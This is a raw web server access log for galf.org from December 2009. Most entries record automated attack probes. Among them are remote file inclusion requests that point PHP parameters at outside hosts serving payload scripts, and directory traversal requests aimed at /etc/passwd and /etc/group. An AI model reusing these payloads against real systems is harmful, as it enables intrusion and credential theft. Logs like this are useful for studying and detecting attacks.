190.152.145.54 - - [20/Dec/2009:20:55:15 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:20:55:15 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:20:55:15 -0800] "GET /logs/access_091012.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:02:58 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:03:01 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:03:02 -0800] "GET /logs/access_091109.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:03:04 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:03:08 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:03:08 -0800] "GET /logs/access_091109.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:21:03:18 -0800] "GET /logs/access.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:21:05:51 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:21:06:05 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:21:06:05 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:21:06:18 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:21:06:18 -0800] "GET /logs/access_091012.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:21:06:18 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:08:09 -0800] "GET /logs/access_090921.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:21:08:24 -0800] "GET /logs/access_090921.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:21:10:14 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:21:10:33 -0800] "GET /logs/access_091012.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:21:11:03 -0800] "GET /logs/access_090629.log%20/template.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:21:11:03 -0800] "GET /logs/template.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:21:11:03 -0800] "GET /template.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:21:11:06 -0800] "GET /logs/access_090629.log%20/template.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:21:11:18 -0800] "GET /logs/template.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:21:11:19 -0800] "GET /template.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
212.95.32.166 - - [20/Dec/2009:21:12:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
209.97.212.123 - - [20/Dec/2009:21:13:14 -0800] "GET /logs/access_090706.log//contrib/yabbse/poc.php?poc_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:21:13:14 -0800] "GET /logs/access_090706.log//contrib/yabbse/poc.php?poc_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:17:36 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:17:36 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:17:37 -0800] "GET /logs/access_090831.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:21:18:52 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:21:19:03 -0800] "GET /logs/access_091012.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:21:21:13 -0800] "GET /template.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "galf.org"
200.219.195.66 - - [20/Dec/2009:21:21:23 -0800] "GET /template.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
90.182.36.30 - - [20/Dec/2009:21:21:56 -0800] "GET /logs/access_090831.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:21:56 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:21:56 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
67.195.37.190 - - [20/Dec/2009:21:25:32 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.195.37.190 - - [20/Dec/2009:21:25:32 -0800] "GET /logs/access.log HTTP/1.0" 200 233885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.231.240.106 - - [20/Dec/2009:21:27:46 -0800] "GET /logs/access_091005.log/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:27:46 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:27:46 -0800] "GET /logs/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:27:53 -0800] "GET /logs/access_091005.log/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:27:53 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:27:53 -0800] "GET /logs/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:29:02 -0800] "GET /logs/access_091005.log/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:29:02 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:29:05 -0800] "GET /logs/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:29:10 -0800] "GET /logs/access_091005.log/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:29:10 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:21:29:10 -0800] "GET /logs/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:37 -0800] "GET /logs/access_090803.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:37 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:38 -0800] "GET /logs/access_090803.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:45 -0800] "GET /logs/access_090803.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:49 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:31:49 -0800] "GET /logs/access_090803.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:21:31:57 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [20/Dec/2009:21:31:57 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [20/Dec/2009:21:31:57 -0800] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:21:32:20 -0800] "GET /logs/access_090803.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:32:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:32:20 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:32:20 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:32:21 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:32:21 -0800] "GET /logs/access_090803.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:21:34:32 -0800] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [20/Dec/2009:21:35:25 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:21:35:25 -0800] "GET /logs/access_090831.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:21:35:25 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:40:05 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:40:05 -0800] "GET /logs/access_090921.log%20%20//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:40:05 -0800] "GET /include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:40:06 -0800] "GET /include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:40:06 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:40:06 -0800] "GET /logs/access_090921.log%20%20//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:41:00 -0800] "GET /logs/access_090921.log//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:41:00 -0800] "GET /include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:41:00 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:41:04 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:41:04 -0800] "GET /include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:21:41:04 -0800] "GET /logs/access_090921.log//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:21:47:14 -0800] "GET /logs//appserv/main.php?appserv_root=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:21:47:14 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:21:47:14 -0800] "GET /appserv/main.php?appserv_root=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [20/Dec/2009:21:47:57 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:21:48:02 -0800] "GET /logs/access_090706.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:21:48:02 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:21:48:02 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:21:48:20 -0800] "GET /logs/access_090921.log%20%20/index.php?doc=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:21:48:20 -0800] "GET /logs/index.php?doc=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:21:48:20 -0800] "GET /index.php?doc=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:21:49:23 -0800] "GET /index.php?doc=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:21:49:23 -0800] "GET /logs/access_090921.log%20%20/index.php?doc=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:21:49:23 -0800] "GET /logs/index.php?doc=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:50:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:50:43 -0800] "GET /logs/access_090720.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:50:43 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:50:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:50:45 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:50:48 -0800] "GET /logs/access_090720.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:53:17 -0800] "GET /logs/access_090720.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:53:17 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:53:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [20/Dec/2009:21:53:19 -0800] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:21:54:26 -0800] "GET /logs/access_090615.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:21:55:04 -0800] "GET /logs/access_090921.log/index.php?doc=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:21:55:22 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:21:55:22 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.0" 404 - "-" "-" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:21:59:45 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:00:26 -0800] "GET /logs/access_090810.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
